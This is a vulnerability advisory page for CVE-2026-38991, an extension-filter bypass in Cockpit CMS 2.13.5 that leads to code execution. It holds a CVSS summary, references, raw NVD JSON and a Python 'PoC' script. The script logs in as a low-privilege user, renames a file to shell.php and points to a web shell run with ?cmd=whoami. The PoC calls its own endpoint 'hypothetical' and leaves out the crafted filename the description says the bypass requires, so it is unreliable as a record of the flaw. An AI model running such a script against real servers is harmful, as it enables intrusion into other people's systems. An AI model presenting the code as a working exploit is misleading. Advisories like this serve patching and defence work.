Security Vulnerability Report
CVE-2026-38991 CVSS 8.8 HIGH

CVE-2026-38991

Published: 2026-04-29 16:16:24
Last Modified: 2026-04-29 21:22:20

Description

Cockpit 2.13.5 and earlier is affected by a misconfiguration within the Bucket component _isFileTypeAllowed function where a specially crafted filename bypasses an extension filter. This allows an authenticated attacker to rename arbitrary files with the .php file extension enabling arbitrary code to be executed on the underlying server.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cockpit CMS <= 2.13.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://localhost:8080"
login_url = f"{target_url}/auth/login"
rename_url = f"{target_url}/api/bucket/rename"  # Hypothetical endpoint

# Low privilege credentials
credentials = {
    "user": "lowpriv_user",
    "password": "password123"
}

session = requests.Session()

# 1. Authenticate
print("[+] Attempting login...")
resp = session.post(login_url, json=credentials)
if resp.status_code != 200:
    print("[-] Login failed")
    exit(1)
print("[+] Login successful")

# 2. Exploit: Rename arbitrary file to .php
# Assuming we have a file ID 'image1.png' that we want to turn into a shell
payload = {
    "id": "image1.png",
    "name": "shell.php"  # Vulnerable filter allows this bypass
}
print("[+] Sending malicious rename request...")
exploit_resp = session.post(rename_url, json=payload)
if exploit_resp.status_code == 200:
    print(f"[+] Exploit success! Access shell at: {target_url}/storage/uploads/shell.php?cmd=whoami")
else:
    print(f"[-] Exploit failed. Status: {exploit_resp.status_code}")
```

References

https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/
https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38991", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:23.797", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cockpit 2.13.5 and earlier is affected by a misconfiguration within the Bucket component _isFileTypeAllowed function where a specially crafted filename bypasses an extension filter. This allows an authenticated attacker to rename arbitrary files with the .php file extension enabling arbitrary code to be executed on the underlying server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/", "source": "[email protected]"}, {"url": "https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.14.0", "source": "[email protected]"}, {"url": "https://felsec.com/posts/cockpit-cms-2.13.5-multi-vulns/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}